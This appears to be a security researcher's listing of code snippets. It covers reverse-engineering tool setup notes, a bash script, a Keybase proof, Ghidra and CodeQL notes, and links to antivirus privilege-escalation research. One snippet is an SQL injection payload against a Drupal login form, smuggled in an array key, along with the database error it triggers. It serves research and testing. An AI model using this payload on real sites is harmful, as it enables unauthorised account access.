- Anonymous - Script kiddies. Also see: Slacktivism
- Advanced - More advanced than the products the presenter sells
- APT - "Fancy name for shit you have in your network and didn't notice for a while"
- China - Because why not? Also see: Attribution Dice
http://code.google.com/p/paimei/ - As of r253 | |
- You need pydasm, it is included in the libdasm package. v1.5 is fine, you don't want to fight with the bugs of the unstable version - http://code.google.com/p/libdasm/ | |
- PyDasm will cry about MSVC scripts but you don't need those. Install MinGW (with C++ support?) - http://www.mingw.org/ | |
- Add MinGw's bin directory to your path or else it won't find gcc | |
- Remove the -mno-cygwin parameters from pythonXX\lib\distutils\cygwinccompiler.py, remove the .pyc to recompile | |
- setup.py build_ext --compiler=mingw32 | |
- setup.py install may fail. Install the lib by copying the .pyd file from the build directory to PythonXX\Lib\site-packages | |
- You don't need PaiMei's dependencies to use PyDbg, just simply build and install with setup.py | |
- Remove the bundled pydasm.pyd from the PaiMei package |
#!/bin/bash | |
if [ $1 ]; then | |
if [[ $2 && $2 == "done" ]]; then | |
rm ~/_todo/$1; | |
else | |
touch ~/_todo/$1; | |
fi; | |
fi; |
name[0%20%20oxr%201%3d1%20--%20]=admin&name[0]=admin&pass=S2test&form_build_id=form-sn1hRoa-B1e-GhbPCBRswqRllD0noOdRnJE5iiO53pI&form_id=user_login_block&op=Log+in | |
<li><em class="placeholder">PDOException</em>: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'oxr 1=1 -- , 'admin' AND status = 1' at line 1: SELECT * FROM {users} WHERE name = :name_0 oxr 1=1 -- , :name_0 AND status = 1; Array | |
( | |
[:name_0 oxr 1=1 -- ] => admin | |
[:name_0] => admin | |
) |
I hereby claim:
- I am v-p-b on github.
- I am buherator (https://keybase.io/buherator) on keybase.
- I have a public key whose fingerprint is 1DD5 6AFB 0660 4106 7B70 4F71 B84C 47BD 86EA 1855
To claim this, I am signing this object:
import sys | |
import struct | |
""" | |
From debugger trace to Lighthouse | |
================================= | |
Converting debugger trace logs to binary drcov format that is good enough for Lighthouse. |
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE jasperReport PUBLIC "-//JasperReports//DTD Report Design//EN" "http://jasperreports.sourceforge.net/dtds/jasperreport.dtd"> | |
<jasperReport name="FirstJasper" columnCount="2" pageWidth="595" pageHeight="842" columnWidth="270" columnSpacing="15" leftMargin="20" rightMargin="20" topMargin="30" bottomMargin="30"> | |
<style name="Arial_Normal" isDefault="true" fontName="Arial" fontSize="8" isBold="false" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica" pdfEncoding="Cp1252" isPdfEmbedded="false"/> | |
<style name="Arial_Bold" isDefault="false" fontName="Arial" fontSize="8" isBold="true" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Bold" pdfEncoding="Cp1252" isPdfEmbedded="false"/> | |
<style name="Arial_Italic" isDefault="false" fontName="Arial" fontSize="8" isBold="false" isItalic="true" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Oblique" pdfEncoding="Cp1252" isPdfEmbedded="fa |
https://seclists.org/fulldisclosure/2019/Aug/1 | |
https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67 | |
https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/ | |
https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM | |
https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM | |
https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM | |
http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html | |
https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968 | |
https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6 | |
https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html |
My current target uses a deterministic pattern when calling C++ constructors, so I can use the CFG to identify object instantiation. Here are my notes about how to use Ghidra's decompiler to get the sizes of objects to be created:
We can use the parameter of operator_new()
to find the size of the objects. Instead of parsing the instructions of the relevant basic blocks (and hoping that we don't run into some unexpected instruction sequences generated by the compiler) we can use the decompiler to get the association between the call to operator_new()
and its parameter.
Ghidra/Features/Decompiler/ghidra_scripts/ShowCCallsScript.java
contains a nice example of how to use the Decompiler API. First, an instance of DecompInterface
must be created, as shown in setUpDecompiler()
. Note that this method doesn't call openProgram()
on the returned DecomInterface
object, that is necessary to run decompilation! The decompileFunction()
method works as expected - the returned DecompileResults
object con
Install the CodeQL extension and configure the CLI!
This is not strictly mandatory, but you probably want something like this: